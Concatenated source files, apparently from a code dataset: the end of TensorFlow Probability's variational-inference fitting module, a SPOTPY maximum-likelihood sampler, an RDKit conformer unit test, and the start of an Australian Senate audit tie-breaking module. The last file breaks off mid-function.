# Toy 1D data.
index_points = np.array([-10., -7.2, -4., -0.1, 0.1, 4., 6.2, 9.]).reshape(
[-1, 1]).astype(np.float32)
observed_counts = np.array(
[100, 90, 60, 13, 18, 37, 55, 42]).astype(np.float32)
# Generative model.
def model_fn():
kernel_amplitude = yield tfd.LogNormal(
loc=0., scale=1., name='kernel_amplitude')
kernel_lengthscale = yield tfd.LogNormal(
loc=0., scale=1., name='kernel_lengthscale')
observation_noise_scale = yield tfd.LogNormal(
loc=0., scale=1., name='observation_noise_scale')
kernel = tfp.math.psd_kernels.ExponentiatedQuadratic(
amplitude=kernel_amplitude,
length_scale=kernel_lengthscale)
latent_log_rates = yield tfd.GaussianProcess(
kernel,
index_points=index_points,
observation_noise_variance=observation_noise_scale,
name='latent_log_rates')
y = yield tfd.Independent(tfd.Poisson(log_rate=latent_log_rates),
reinterpreted_batch_ndims=1,
name='y')
model = tfd.JointDistributionCoroutineAutoBatched(model_fn)
pinned = model.experimental_pin(y=observed_counts)
```
Next we define a variational family. This is represented statelessly
as a `build_surrogate_posterior_fn` from raw (unconstrained) parameters to
a surrogate posterior distribution. Note that common variational families can
be constructed automatically using the utilities in `tfp.experimental.vi`;
here we demonstrate a manual approach.
```python
initial_parameters = (0., 0., 0., # Raw kernel parameters.
tf.zeros_like(observed_counts), # `logit_locs`
tf.zeros_like(observed_counts)) # `logit_raw_scales`
def build_surrogate_posterior_fn(
raw_kernel_amplitude, raw_kernel_lengthscale, raw_observation_noise_scale,
logit_locs, logit_raw_scales):
def variational_model_fn():
# Fit the kernel parameters as point masses.
yield tfd.Deterministic(
tf.nn.softplus(raw_kernel_amplitude), name='kernel_amplitude')
yield tfd.Deterministic(
tf.nn.softplus(raw_kernel_lengthscale), name='kernel_lengthscale')
yield tfd.Deterministic(
tf.nn.softplus(raw_observation_noise_scale),
name='kernel_observation_noise_scale')
# Factored normal posterior over the GP logits.
yield tfd.Independent(
tfd.Normal(loc=logit_locs,
scale=tf.nn.softplus(logit_raw_scales)),
reinterpreted_batch_ndims=1,
name='latent_log_rates')
return tfd.JointDistributionCoroutineAutoBatched(variational_model_fn)
```
Finally, we fit the variational posterior and model variables jointly. We'll
use a custom `trace_fn` to see how the kernel amplitudes and a set of sampled
latent rates with fixed seed evolve during the course of the optimization:
```python
[
optimized_parameters,
(losses, amplitude_path, sample_path)
] = tfp.vi.fit_surrogate_posterior_stateless(
target_log_prob_fn=pinned.unnormalized_log_prob,
build_surrogate_posterior_fn=build_surrogate_posterior_fn,
initial_parameters=initial_parameters,
optimizer=optax.adam(learning_rate=0.1),
sample_size=1,
num_steps=500,
trace_fn=lambda traceable_quantities: ( # pylint: disable=g-long-lambda
traceable_quantities.loss,
tf.nn.softplus(traceable_quantities.parameters[0]),
build_surrogate_posterior_fn(
*traceable_quantities.parameters).sample(
5, seed=(42, 42))[-1]),
seed=(42, 42))
surrogate_posterior = build_surrogate_posterior_fn(*optimized_parameters)
```
#### References
[1]: Christopher M. Bishop. Pattern Recognition and Machine Learning.
Springer, 2006.
[2] Yuri Burda, Roger Grosse, and Ruslan Salakhutdinov. Importance Weighted
Autoencoders. In _International Conference on Learning
Representations_, 2016. https://arxiv.org/abs/1509.00519
[3] Tom Rainforth, Adam R. Kosiorek, Tuan Anh Le, Chris J. Maddison,
Maximilian Igl, Frank Wood, and Yee Whye Teh. Tighter Variational Bounds
are Not Necessarily Better. In _International Conference on Machine
Learning (ICML)_, 2018. https://arxiv.org/abs/1802.04537
"""
def variational_loss_fn(*parameters, seed=None):
surrogate_posterior = build_surrogate_posterior_fn(*parameters)
stopped_surrogate_posterior = None
if (gradient_estimator ==
csiszar_divergence.GradientEstimators.DOUBLY_REPARAMETERIZED):
stopped_surrogate_posterior = build_surrogate_posterior_fn(
*tf.nest.map_structure(tf.stop_gradient, parameters))
return csiszar_divergence.monte_carlo_variational_loss(
target_log_prob_fn,
surrogate_posterior=surrogate_posterior,
discrepancy_fn=discrepancy_fn,
importance_sample_size=importance_sample_size,
sample_size=sample_size,
gradient_estimator=gradient_estimator,
stopped_surrogate_posterior=stopped_surrogate_posterior,
seed=seed)
return tfp_math.minimize_stateless(
variational_loss_fn,
init=initial_parameters,
num_steps=num_steps,
optimizer=optimizer,
convergence_criterion=convergence_criterion,
trace_fn=trace_fn,
jit_compile=jit_compile,
seed=seed,
name=name)
@deprecation.deprecated_args(
'2022-03-01',
'Custom loss functions are no longer supported in '
'`fit_surrogate_posterior`. Instead, use the `discrepancy_fn` argument to '
'specify a custom divergence, or pass a custom loss directly to '
'`tfp.math.minimize` as '
'`loss_fn=functools.partial(variational_loss_fn, '
'target_log_prob_fn=target_log_prob_fn, '
'surrogate_posterior=surrogate_posterior, '
'sample_size=sample_size)`.',
'variational_loss_fn')
def fit_surrogate_posterior(target_log_prob_fn,
surrogate_posterior,
optimizer,
num_steps,
convergence_criterion=None,
trace_fn=_trace_loss,
variational_loss_fn=None,
discrepancy_fn=csiszar_divergence.kl_reverse,
sample_size=1,
importance_sample_size=1,
trainable_variables=None,
jit_compile=None,
seed=None,
name='fit_surrogate_posterior'):
"""Fit a surrogate posterior to a target (unnormalized) log density.
The default behavior constructs and minimizes the negative variational
evidence lower bound (ELBO), given by
```python
q_samples = surrogate_posterior.sample(num_draws)
elbo_loss = -tf.reduce_mean(
target_log_prob_fn(q_samples) - surrogate_posterior.log_prob(q_samples))
```
This corresponds to minimizing the 'reverse' Kullback-Liebler divergence
(`KL[q||p]`) between the variational distribution and the unnormalized
`target_log_prob_fn`, and defines a lower bound on the marginal log
likelihood, `log p(x) >= -elbo_loss`. [1]
More generally, this function supports fitting variational distributions that
minimize any
[Csiszar f-divergence](https://en.wikipedia.org/wiki/F-divergence).
Args:
target_log_prob_fn: Python callable that takes a set of `Tensor` arguments
and returns a `Tensor` log-density. Given
`q_sample = surrogate_posterior.sample(sample_size)`, this
will be called as `target_log_prob_fn(*q_sample)` if `q_sample` is a list
or a tuple, `target_log_prob_fn(**q_sample)` if `q_sample` is a
dictionary, or `target_log_prob_fn(q_sample)` if `q_sample` is a `Tensor`.
It should support batched evaluation, i.e., should return a result of
shape `[sample_size]`.
surrogate_posterior: A `tfp.distributions.Distribution`
instance defining a variational posterior (could be a
`tfd.JointDistribution`). Crucially, the distribution's `log_prob` and
(if reparameterized) `sample` methods must directly invoke all ops
that generate gradients to the underlying variables. One way to ensure
this is to use `tfp.util.TransformedVariable` and/or
`tfp.util.DeferredTensor` to represent any parameters defined as
transformations of unconstrained variables, so that the transformations
execute at runtime instead of at distribution creation.
optimizer: Optimizer instance to use. This may be a TF1-style
`tf.train.Optimizer`, TF2-style `tf.optimizers.Optimizer`, or any Python
object that implements `optimizer.apply_gradients(grads_and_vars)`.
num_steps: Python `int` number of steps to run the optimizer.
convergence_criterion: Optional instance of
`tfp.optimizer.convergence_criteria.ConvergenceCriterion`
representing a criterion for detecting convergence. If `None`,
the optimization will run for `num_steps` steps, otherwise, it will run
for at *most* `num_steps` steps, as determined by the provided criterion.
Default value: `None`.
trace_fn: Python callable with signature `traced_values = trace_fn(
traceable_quantities)`, where the argument is an instance of
`tfp.math.MinimizeTraceableQuantities` and the returned `traced_values`
may be a `Tensor` or nested structure of `Tensor`s. The traced values are
stacked across steps and returned.
The default `trace_fn` simply returns the loss. In general, trace
functions may also examine the gradients, values of parameters,
the state propagated by the specified `convergence_criterion`, if any (if
no convergence criterion is specified, this will be `None`),
as well as any other quantities captured in the closure of `trace_fn`,
for example, statistics of a variational distribution.
Default value: `lambda traceable_quantities: traceable_quantities.loss`.
variational_loss_fn: Optional Python `callable` with signature
`loss = variational_loss_fn(target_log_prob_fn, surrogate_posterior,
sample_size, seed)` defining a variational loss function. The default is
a Monte Carlo approximation to the standard evidence lower bound (ELBO),
equivalent to minimizing the 'reverse' `KL[q||p]` divergence between the
surrogate `q` and true posterior `p`. [1]
Default value: `None` (equivalent to `functools.partial(
tfp.vi.monte_carlo_variational_loss,
discrepancy_fn=tfp.vi.kl_reverse,
importance_sample_size=importance_sample_size,
use_reparameterization=True)`.
discrepancy_fn: Python `callable` representing a Csiszar `f` function in
in log-space. See the docs for `tfp.vi.monte_carlo_variational_loss` for
examples. This argument is ignored if a `variational_loss_fn` is
explicitly specified.
Default value: `tfp.vi.kl_reverse`.
sample_size: Python `int` number of Monte Carlo samples to use
in estimating the variational divergence. Larger values may stabilize
the optimization, but at higher cost per step in time and memory.
Default value: `1`.
importance_sample_size: Python `int` number of terms used to define an
importance-weighted divergence. If `importance_sample_size > 1`, then the
`surrogate_posterior` is optimized to function as an importance-sampling
proposal distribution. In this case, posterior expectations should be
approximated by importance sampling, as demonstrated in the example below.
This argument is ignored if a `variational_loss_fn` is explicitly
specified.
Default value: `1`.
trainable_variables: Optional list of `tf.Variable` instances to optimize
with respect to. If `None`, defaults to the set of all variables accessed
during the computation of the variational bound, i.e., those defining
`surrogate_posterior` and the model `target_log_prob_fn`.
Default value: `None`
jit_compile: If True, compiles the loss function and gradient update using
XLA. XLA performs compiler optimizations, such as fusion, and attempts to
emit more efficient code. This may drastically improve the performance.
See the docs for `tf.function`. (In JAX, this will apply `jax.jit`).
Default value: `None`.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
name: Python `str` name prefixed to ops created by this function.
Default value: 'fit_surrogate_posterior'.
Returns:
results: `Tensor` or nested structure of `Tensor`s, according to the return
type of `trace_fn`. Each `Tensor` has an added leading dimension of size
`num_steps`, packing the trajectory of the result over the course of the
optimization.
#### Examples
**Normal-Normal model**. We'll first consider a simple model
`z ~ N(0, 1)`, `x ~ N(z, 1)`, where we suppose we are interested in the
posterior `p(z | x=5)`:
```python
import tensorflow_probability as tfp
from tensorflow_probability import distributions as tfd
def log_prob(z, x):
return tfd.Normal(0., 1.).log_prob(z) + tfd.Normal(z, 1.).log_prob(x)
conditioned_log_prob = lambda z: log_prob(z, x=5.)
```
The posterior is itself normal by [conjugacy](
https://en.wikipedia.org/wiki/Conjugate_prior), and can be computed
analytically (it's `N(loc=5/2., scale=1/sqrt(2)`). But suppose we don't want
to bother doing the math: we can use variational inference instead!
```python
q_z = tfp.experimental.util.make_trainable(tfd.Normal, name='q_z')
losses = tfp.vi.fit_surrogate_posterior(
conditioned_log_prob,
surrogate_posterior=q_z,
optimizer=tf.optimizers.Adam(learning_rate=0.1),
num_steps=100)
print(q_z.mean(), q_z.stddev()) # => approximately [2.5, 1/sqrt(2)]
```
**Custom loss function**. Suppose we prefer to fit the same model using
the forward KL divergence `KL[p||q]`. We can pass a custom discrepancy
function:
```python
losses = tfp.vi.fit_surrogate_posterior(
conditioned_log_prob,
surrogate_posterior=q_z,
optimizer=tf.optimizers.Adam(learning_rate=0.1),
num_steps=100,
discrepancy_fn=tfp.vi.kl_forward)
```
Note that in practice this may have substantially higher-variance gradients
than the reverse KL.
**Importance weighting**. A surrogate posterior may be corrected by
interpreting it as a proposal for an [importance sampler](
https://en.wikipedia.org/wiki/Importance_sampling). That is, one can use
weighted samples from the surrogate to estimate expectations under the true
posterior:
```python
zs, q_log_prob = surrogate_posterior.experimental_sample_and_log_prob(
num_samples)
# Naive expectation under the surrogate posterior.
expected_x = tf.reduce_mean(f(zs), axis=0)
# Importance-weighted estimate of the expectation under the true posterior.
self_normalized_log_weights = tf.nn.log_softmax(
target_log_prob_fn(zs) - q_log_prob)
expected_x = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * f(zs),
axis=0)
```
Any distribution may be used as a proposal, but it is often natural to
consider surrogates that were themselves fit by optimizing an
importance-weighted variational objective [2], which directly optimizes the
surrogate's effectiveness as an proposal distribution. This may be specified
by passing `importance_sample_size > 1`. The importance-weighted objective
may favor different characteristics than the original objective.
For example, effective proposals are generally overdispersed, whereas a
surrogate optimizing reverse KL would otherwise tend to be underdispersed.
Although importance sampling is guaranteed to tighten the variational bound,
some research has found that this does not necessarily improve the quality
of deep generative models, because it also introduces gradient noise that can
lead to a weaker training signal [3]. As always, evaluation is important to
choose the approach that works best for a particular task.
When using an importance-weighted loss to fit a surrogate, it is also
recommended to apply importance sampling when computing expectations
under that surrogate.
```python
# Fit `q` with an importance-weighted variational loss.
losses = tfp.vi.fit_surrogate_posterior(
conditioned_log_prob,
surrogate_posterior=q_z,
importance_sample_size=10,
optimizer=tf.optimizers.Adam(learning_rate=0.1),
num_steps=200)
# Estimate posterior statistics with importance sampling.
zs, q_log_prob = q_z.experimental_sample_and_log_prob(1000)
self_normalized_log_weights = tf.nn.log_softmax(
conditioned_log_prob(zs) - q_log_prob)
posterior_mean = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * zs,
axis=0)
posterior_variance = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * (zs - posterior_mean)**2,
axis=0)
```
**Inhomogeneous Poisson Process**. For a more interesting example, let's
consider a model with multiple latent variables as well as trainable
parameters in the model itself. Given observed counts `y` from spatial
locations `X`, consider an inhomogeneous Poisson process model
`log_rates = GaussianProcess(index_points=X); y = Poisson(exp(log_rates))`
in which the latent (log) rates are spatially correlated following a Gaussian
process. We'll fit a variational model to the latent rates while also
optimizing the GP kernel hyperparameters (largely for illustration; in
practice we might prefer to 'be Bayesian' about these parameters and include
them as latents in our model and variational posterior). First we define
the model, including trainable variables:
```python
# Toy 1D data.
index_points = np.array([-10., -7.2, -4., -0.1, 0.1, 4., 6.2, 9.]).reshape(
[-1, 1]).astype(np.float32)
observed_counts = np.array(
[100, 90, 60, 13, 18, 37, 55, 42]).astype(np.float32)
# Trainable GP hyperparameters.
kernel_log_amplitude = tf.Variable(0., name='kernel_log_amplitude')
kernel_log_lengthscale = tf.Variable(0., name='kernel_log_lengthscale')
observation_noise_log_scale = tf.Variable(
0., name='observation_noise_log_scale')
# Generative model.
Root = tfd.JointDistributionCoroutine.Root
def model_fn():
kernel = tfp.math.psd_kernels.ExponentiatedQuadratic(
amplitude=tf.exp(kernel_log_amplitude),
length_scale=tf.exp(kernel_log_lengthscale))
latent_log_rates = yield Root(tfd.GaussianProcess(
kernel,
index_points=index_points,
observation_noise_variance=tf.exp(observation_noise_log_scale),
name='latent_log_rates'))
y = yield tfd.Independent(tfd.Poisson(log_rate=latent_log_rates, name='y'),
reinterpreted_batch_ndims=1)
model = tfd.JointDistributionCoroutine(model_fn)
```
Next we define a variational distribution. We incorporate the observations
directly into the variational model using the 'trick' of representing them
by a deterministic distribution (observe that the true posterior on an
observed value is in fact a point mass at the observed value).
```
logit_locs = tf.Variable(tf.zeros(observed_counts.shape), name='logit_locs')
logit_softplus_scales = tf.Variable(tf.ones(observed_counts.shape) * -4,
name='logit_softplus_scales')
def variational_model_fn():
latent_rates = yield Root(tfd.Independent(
tfd.Normal(loc=logit_locs, scale=tf.nn.softplus(logit_softplus_scales)),
reinterpreted_batch_ndims=1))
y = yield tfd.VectorDeterministic(observed_counts)
q = tfd.JointDistributionCoroutine(variational_model_fn)
```
Note that here we could apply transforms to variables without using
`DeferredTensor` because the `JointDistributionCoroutine` argument is a
function, i.e., executed "on demand." (The same is true when
distribution-making functions are supplied to `JointDistributionSequential`
and `JointDistributionNamed`. That is, as long as variables are transformed
*within* the callable, they will appear on the gradient tape when
`q.log_prob()` or `q.sample()` are invoked.
Finally, we fit the variational posterior and model variables jointly: by not
explicitly specifying `trainable_variables`, the optimization will
automatically include all variables accessed. We'll
use a custom `trace_fn` to see how the kernel amplitudes and a set of sampled
latent rates with fixed seed evolve during the course of the optimization:
```python
losses, log_amplitude_path, sample_path = tfp.vi.fit_surrogate_posterior(
target_log_prob_fn=lambda *args: model.log_prob(args),
surrogate_posterior=q,
optimizer=tf.optimizers.Adam(learning_rate=0.1),
sample_size=1,
num_steps=500,
trace_fn=lambda loss, grads, vars: (loss, kernel_log_amplitude,
q.sample(5, seed=42)[0]))
```
#### References
[1]: Christopher M. Bishop. Pattern Recognition and Machine Learning.
Springer, 2006.
[2] Yuri Burda, Roger Grosse, and Ruslan Salakhutdinov. Importance Weighted
Autoencoders. In _International Conference on Learning
Representations_, 2016. https://arxiv.org/abs/1509.00519
[3] Tom Rainforth, Adam R. Kosiorek, Tuan Anh Le, Chris J. Maddison,
Maximilian Igl, Frank Wood, and Yee Whye Teh. Tighter Variational Bounds
are Not Necessarily Better. In _International Conference on Machine
Learning (ICML)_, 2018. https://arxiv.org/abs/1802.04537
"""
if variational_loss_fn is None:
variational_loss_fn = functools.partial(
csiszar_divergence.monte_carlo_variational_loss,
discrepancy_fn=discrepancy_fn,
importance_sample_size=importance_sample_size,
# Silent fallback to score-function gradients leads to
# difficult-to-debug failures, so force reparameterization gradients by
# default.
gradient_estimator=(
csiszar_divergence.GradientEstimators.REPARAMETERIZATION),
)
def complete_variational_loss_fn(seed=None):
return variational_loss_fn(
target_log_prob_fn,
surrogate_posterior,
sample_size=sample_size,
seed=seed)
return tfp_math.minimize(complete_variational_loss_fn,
num_steps=num_steps,
optimizer=optimizer,
convergence_criterion=convergence_criterion,
trace_fn=trace_fn,
trainable_variables=trainable_variables,
jit_compile=jit_compile,
seed=seed,
name=name)
|
tensorflow/probability
|
tensorflow_probability/python/vi/optimization.py
|
Python
|
apache-2.0
| 34,769
|
[
"Gaussian"
] |
d35d60dea675aa2d09f89bf379057b3dc0dff0ffe40bfa4e40b8c7b0a513f023
|
# -*- coding: utf-8 -*-
'''
Copyright (c) 2015 by Tobias Houska
This file is part of Statistical Parameter Estimation Tool (SPOTPY).
:author: Tobias Houska
This class holds the MaximumLikelihoodEstimation (MLE) algorithm.
'''
from . import _algorithm
import numpy as np
import time
class mle(_algorithm):
'''
Implements the Maximum Likelihood Estimation algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values as return by the model.
dbname: str
* Name of the database where parameter, objectivefunction value and simulation results will be saved.
dbformat: str
* ram: fast suited for short sampling time. no file will be created and results are saved in an array.
* csv: A csv file will be created, which you can import afterwards.
save_sim: boolean
*True: Simulation results will be saved
*False: Simulationt results will not be saved
'''
def __init__(self, spot_setup, dbname=None, dbformat=None, parallel='seq',save_sim=True):
_algorithm.__init__(self,spot_setup, dbname=dbname, dbformat=dbformat, parallel=parallel,save_sim=save_sim)
def check_par_validity(self,par):
if len(par) == len(self.min_bound) and len(par) == len(self.max_bound):
for i in range(len(par)):
if par[i]<self.min_bound[i]:
par[i]=self.min_bound[i]
if par[i]>self.max_bound[i]:
par[i]=self.max_bound[i]
return par
else:
print('ERROR: Bounds have not the same lenghts as Parameterarray')
return par
def sample(self, repetitions):
# Define stepsize of MCMC.
stepsizes = self.parameter()['step'] # array of stepsizes
accepted = 0.0
starttime=time.time()
intervaltime=starttime
self.min_bound, self.max_bound = self.parameter()['minbound'],self.parameter()['maxbound']
# Metropolis-Hastings iterations.
burnIn=int(repetitions/10)
likes=[]
pars=[]
sims=[]
print('burnIn...')
for i in range(burnIn):
par = self.parameter()['random']
pars.append(par)
sim = self.model(par)
sims.append(sim)
like = self.objectivefunction(evaluation = self.evaluation, simulation = sim)
likes.append(like)
self.datawriter.save(like,par,simulations=sim)
self.status(i,like,par)
#Progress bar
acttime=time.time()
#Refresh progressbar every second
if acttime-intervaltime>=2:
text='%i of %i (best like=%g)' % (i,repetitions,self.status.objectivefunction)
print(text)
intervaltime=time.time()
old_like = max(likes)
old_par =pars[likes.index(old_like)]
old_simulations=sims[likes.index(old_like)]
print('Beginn Random Walk')
for rep in range(repetitions-burnIn):
# Suggest new candidate from Gaussian proposal distribution.
new_par = []#np.zeros([len(old_par)])
for i in range(len(old_par)):
# Use stepsize provided for every dimension.
new_par.append(np.random.normal(loc=old_par[i], scale=stepsizes[i]))
new_par=self.check_par_validity(new_par)
new_simulations = self.model(new_par)
new_like = self.objectivefunction(evaluation = self.evaluation, simulation=new_simulations)
# Accept new candidate in Monte-Carlo fashing.
if (new_like > old_like):
self.datawriter.save(new_like,new_par,simulations=new_simulations)
accepted = accepted + 1.0 # monitor acceptance
old_par=new_par
old_simulations=new_simulations
old_like=new_like
self.status(rep,new_like,new_par)
else:
self.datawriter.save(old_like,old_par,simulations=old_simulations)
#Progress bar
acttime=time.time()
#Refresh progressbar every second
if acttime-intervaltime>=2:
text='%i of %i (best like=%g)' % (rep+burnIn,repetitions,self.status.objectivefunction)
print(text)
intervaltime=time.time()
try:
self.datawriter.finalize()
except AttributeError: #Happens if no database was assigned
pass
print('End of sampling')
text="Acceptance rate = "+str(accepted/repetitions)
print(text)
text='%i of %i (best like=%g)' % (self.status.rep,repetitions,self.status.objectivefunction)
print(text)
print('Best parameter set:')
print(self.status.params)
text='Duration:'+str(round((acttime-starttime),2))+' s'
print(text)
|
gitporst/spotpy
|
spotpy/algorithms/mle.py
|
Python
|
mit
| 5,553
|
[
"Gaussian"
] |
0ec85855c572dc5db79aee012d9860396e27ce7b2b9996bec004004eb8fca74f
|
# $Id$
#
# Copyright (C) 2004 Rational Discovery LLC
# All Rights Reserved
#
from rdkit import RDConfig
import os,sys
import unittest
from rdkit import Chem
from rdkit.Geometry import Point3D
def feq(v1,v2,tol2=1e-4):
return abs(v1-v2)<=tol2
def ptEq(pt1, pt2, tol=1e-4):
return feq(pt1.x,pt2.x,tol) and feq(pt1.y,pt2.y,tol) and feq(pt1.z,pt2.z,tol)
def addConf(mol):
conf = Chem.Conformer(mol.GetNumAtoms())
for i in range(mol.GetNumAtoms()):
conf.SetAtomPosition(i,(0.,0.,0.))
mol.AddConformer(conf)
mb = Chem.MolToMolBlock(mol)
mb = Chem.MolToMolBlock(mol)
class TestCase(unittest.TestCase):
def setUp(self):
pass
def test0Conformers(self) :
"""Test the conformer data structure"""
mol = Chem.MolFromSmiles("CC")
conf = Chem.Conformer(2)
conf.SetAtomPosition(0, (-0.5, 0.0, 0.0))
conf.SetAtomPosition(1, (1.0, 0.0, 0.0))
conf.SetId(0)
cid = mol.AddConformer(conf)
self.assertTrue(cid == 0)
conf2 = mol.GetConformer(0)
self.assertTrue(conf2.GetId() == cid)
pt1 = conf2.GetAtomPosition(0)
self.assertTrue(ptEq(pt1, Point3D(-0.5, 0.0, 0.0)))
pt2 = conf2.GetAtomPosition(1)
self.assertTrue(ptEq(pt2, Point3D(1.0, 0.0, 0.0)))
#changing conf should not change conf2 - related to issue 217
conf.SetAtomPosition(1, Point3D(2.0, 0.0, 0.0))
pt2 = conf2.GetAtomPosition(1)
self.assertTrue(feq(pt2[0], 1.0))
conf = Chem.Conformer(2)
conf.SetAtomPosition(0, Point3D(-0.5, 0.0, 0.0))
conf.SetAtomPosition(1, Point3D(1.0, 0.0, 0.0))
conf.SetId(2)
cid = mol.AddConformer(conf, 0)
self.assertTrue(cid == 2)
conf3 = mol.GetConformer(2)
def test0AddHds(self) :
mol = Chem.MolFromSmiles("CC")
conf = Chem.Conformer(1)
conf.SetAtomPosition(0, Point3D(-0.5, 0.0, 0.0))
conf.SetAtomPosition(1, Point3D(1.0, 0.0, 0.0))
cid = mol.AddConformer(conf)
conf2 = mol.GetConformer()
self.assertTrue(conf2.GetNumAtoms() == 2)
nmol = Chem.AddHs(mol, 0,1)
conf3 = nmol.GetConformer()
self.assertTrue(conf3.GetNumAtoms() == 8)
self.assertTrue(conf2.GetNumAtoms() == 2)
targetCoords = [[-0.5, 0.0, 0.0],
[1.0, 0.0, 0.0],
[-0.8667, 0.0, 1.03709],
[-0.8667, 0.8981, -0.5185],
[-0.8667, -0.8981, -0.5185],
[1.3667, 0.0, -1.0371],
[1.36667, 0.8981, 0.5185],
[1.36667, -0.8981, 0.5185]]
for i in range(8) :
pt = conf3.GetAtomPosition(i)
self.assertTrue(ptEq(pt, Point3D(*tuple(targetCoords[i]))))
def test2Issue217(self) :
smi = 'c1ccccc1'
m = Chem.MolFromSmiles(smi)
addConf(m)
self.assertTrue(m.GetNumConformers()==1);
mb2 = Chem.MolToMolBlock(m)
def test3Exceptions(self) :
smi = 'c1ccccc1'
m = Chem.MolFromSmiles(smi)
addConf(m)
self.assertTrue(m.GetNumConformers()==1)
self.assertRaises(ValueError,lambda:m.GetConformer(2))
def test4ConfTuple(self):
smi = 'c1ccccc1'
m = Chem.MolFromSmiles(smi)
for i in range(10):
addConf(m)
confs = m.GetConformers()
self.assertTrue(len(confs) == 10)
for conf in confs:
for i in range(6):
pt = conf.GetAtomPosition(i)
self.assertTrue(ptEq(pt, Point3D(0.0, 0.0, 0.0)))
m.RemoveAllConformers()
self.assertTrue(m.GetNumConformers() == 0)
confs = m.GetConformers()
self.assertTrue(confs == ())
if __name__ == '__main__':
unittest.main()
|
soerendip42/rdkit
|
Code/GraphMol/Wrap/testConformer.py
|
Python
|
bsd-3-clause
| 3,539
|
[
"RDKit"
] |
4922143632fa2168228ad0066728ea1284dfbf0e5b1d024026ab4518d74c0a48
|
"""
Module: audit_tie_breaker
Author: Berj K. Chilingirian
Date: 7 August 2016
Description:
The Australian Senate Election (ASE) may require an Australian Election
Official (AEO) to break a tie. There are three cases in which ties must
be broken manually by an AEO:
Case 1:
If multiple candidates hold the same number of votes and that
number is greater than the quota, then a previous round in which
those candidates held a differing number of votes is used to
determine the election order. If no such round exists, the AEO
determines a permutation of candidate IDs, specifying the order
in which those candidates are elected.
Case 2:
If there are two final continuing candidates, with one remaining
vacancy, and both candidates hold the same number of votes, the
AEO decides which candidate is elected.
Case 3:
If a candidate must be excluded, then the lowest number of votes
held by any candidate is found. If multiple candidates hold that
number of votes, the same tie breaker system in (1) is used. If
that fails, the AEO decides what candidate is excluded.
We want our auditing procedures to be as consistent as possible with the
real ASE. However, the Commonwealth Electoral Act of 1981 does not specify
the tie-breaking procedure of an AEO. Thus, we use tie-breaking information
from the real election to resolve ties encountered during our audit.
To do this, we:
(1) Ingest tie-breaking information (JSON) from the real ASE.
.. code-block:: json
{
'events': [
(17, ['A', 'B', 'C'], 'B', 2),
(21, ['D', 'E', 'F'], ['E', 'F', 'D'], 1),
],
}
where the 4-tuple represents the
RoundNm - The round in which the tie-breaking event
occurred.
CandidateIds - The candidate IDs involved in the tie-breaking
event.
Resolution - The resolution for the tie-breaking event. May
be either a single candidate ID (cases 2, 3)
or a permutation of the candidate IDs involved
in the tie-breaking event (case 1).
CaseNm - The case number identifying the type of tie-breaking
event (corresponds to the cases described above).
(2) Construct a directed, acyclic graph where a directed edge from A to B
represents situations where A is elected over B (cases 1, 2) or B is
excluded (case 3). Note that more than one edge may be created by a
given tie-breaking event.
(3) Sort the vertices into a linear order using a random topological sort.
(4) Use the linear ordering discovered in Step 3 to break all ties
encountered during the audit. In other words, given candidate IDs A and
B, prefer electing/not-excluding the candidate earlier in the linear
order.
Usage:
.. code-block:: python3
>>> import audit_tie_breaker
>>> atb = AuditTieBreaker(['A', 'B', 'C', 'D', 'E', 'F', 'G'], verbose=True)
>>> atb.load_events('contest_tie_breaking_events.json')
= Building Audit Tie-Breaking Graph...
- Case 1: Added edge B->C.
- Case 1: Added edge B->A.
- Case 1: Added edge C->A.
- Case 3: Added edge D->E.
- Case 3: Added edge F->E.
- Case 2: Added edge G->D.
--> Linear order determined as B, C, A, F, G, D, E.
= Verifying linear order is consisent with real election's tie-breaking events...
- Tie between ['A', 'B', 'C'] broken with ['B', 'C', 'A'] for case 1.
- Tie between ['D', 'E', 'F'] broken with E for case 3.
- Tie between ['D', 'G'] broken with G for case 2.
--> Linear order is consistent with real election's tie-breaking events.
>>> atb.break_tie(['A', 'B', 'C'], 1)
- Tie between ['A', 'B', 'C'] broken with ['B', 'C', 'A'] for case 1.
"""
import itertools
import json
import os
import random
import sys
class AuditTieBreaker(object):
""" Implements a class for breaking ties encountered during an audit.
:ivar _vertices: A mapping from a vertex in the audit tie breaking graph to its
neighbors.
:vartype _vertices: dict
:ivar _print_fn: A function which takes a string as input and writes it to the
appropriate file.
:vartype _print_fn: function
:ivar _linear_order: A linear ordering of the candidate IDs of all candidates in
the contest being audited. The linear ordering is represented as a mapping
from a candidate ID to its position in the linear order.
:vartype _linear_order: dict
"""
READ_OPT = 'r'
WRITE_OPT = 'w'
COMMA_DELIM = ', '
EVENTS_KEY = 'events'
EVENTS_FILE_ERROR_MSG = 'The file {0} is not formatted correctly. Expected: \
{ \'events\': [(<RoundNumber>, <CandidateIDs>, <Resolution>, <CaseNm>),]}'
BUILDING_GRAPH_MSG = '= Building Audit Tie-Breaking Graph...'
ADDED_EDGE_MSG = ' - Case {0}: Added edge {1}->{2}.'
LINEAR_ORDER_MSG = ' --> Linear order determined as {0}.'
VERIFY_LINEAR_ORDER_MSG = '\n= Verifying linear order is consisent with real election\'s tie-breaking events...'
IS_CONSISTENT_MSG = ' --> Linear order is consistent with real election\'s tie-breaking events.\n'
TIE_BREAK_MSG = ' - Tie between {0} broken with {1} for case {2}.'
def __init__(self, candidate_ids, seed=1, verbose=False, out_f=None):
""" Initializes the `AuditTieBreaker` object.
:param candidate_ids: A list of the candidate IDs of all candidates in the
election contest.
:type candidate_ids: list
:param verbose: A flag indicating whether or not the `AuditTieBreaker`
object should be verbose when loading data/breaking ties.
:type verbose: bool
:param seed: An integer specifying the random seed to use when determining
the random topological sort of the candidate IDs of all candidates in
the election (default: 1).
:type seed: int
:param out_f: A string representing the name of a file to write all debug
information to (default: stdout). Only used when `verbose` is true.
:type out_f: str
"""
random.seed(seed)
self._vertices = {candidate_id : [] for candidate_id in candidate_ids}
self._print_fn = AuditTieBreaker._setup_print_fn(out_f) if verbose else lambda x : None
self._linear_order = {}
@staticmethod
def _setup_print_fn(out_f):
""" Returns a function to be used for writing verbose information.
:param out_f: A string representing the name of a file to write all debug
information to.
:type out_f: str
